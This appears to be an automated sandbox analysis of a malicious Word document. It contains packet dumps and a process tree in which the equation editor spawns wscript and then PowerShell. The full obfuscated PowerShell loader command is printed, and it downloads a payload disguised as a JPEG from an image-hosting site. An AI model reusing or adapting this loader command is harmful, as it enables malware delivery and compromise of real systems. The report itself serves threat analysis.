2024-04-24 08:24:10 UTC	1369	IN	Data Raw: 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b Data Ascii: <RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
2024-04-24 08:24:10 UTC	1369	IN	Data Raw: 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 Data Ascii: T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
2024-04-24 08:24:10 UTC	1369	IN	Data Raw: db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSS
2024-04-24 08:24:10 UTC	1369	IN	Data Raw: 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 Data Ascii: _4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@B
2024-04-24 08:24:10 UTC	1369	IN	Data Raw: 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49164	172.67.215.45	443	2824	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:24:12 UTC	100	OUT	GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1 Host: uploaddeimagens.com.br
2024-04-24 08:24:13 UTC	701	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:24:13 GMT Content-Type: image/jpeg Content-Length: 4198361 Connection: close Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT ETag: "6627c3ad-400fd9" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 1729 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YIyX%2FdK8eAU3Y6o0d9I8kFvaEmDkWRYpfvsmNGvw8BP8cHevRW%2FMcosZlJIon1kVUMLB3LeY%2BoIGn2o31Ouhj1flmGGSiaKMbwjx1NLxOiepNUjmnBF1hwYrjy%2Fc2Ic%2BLVhI%2BwYDTkoG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8794b219fc2a7c73-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:24:13 UTC	668	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-24 08:24:13 UTC	1369	IN	Data Raw: 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-04-24 08:24:13 UTC	1369	IN	Data Raw: 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 Data Ascii: HVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg
2024-04-24 08:24:13 UTC	1369	IN	Data Raw: 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a
2024-04-24 08:24:13 UTC	1369	IN	Data Raw: d7 07 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 Data Ascii: >2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b
2024-04-24 08:24:13 UTC	1369	IN	Data Raw: 1b 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 Data Ascii: :4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>i
2024-04-24 08:24:13 UTC	1369	IN	Data Raw: 5a b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd Data Ascii: Zr:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
2024-04-24 08:24:13 UTC	1369	IN	Data Raw: 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 Data Ascii: 1Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
2024-04-24 08:24:13 UTC	1369	IN	Data Raw: d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 Data Ascii: lW_4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@
2024-04-24 08:24:13 UTC	1369	IN	Data Raw: b1 de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hC

Target ID:	0
Start time:	10:23:59
Start date:	24/04/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fd00000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:24:00
Start date:	24/04/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:24:04
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs"
Imagebase:	0x170000
File size:	141'824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:24:07
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrex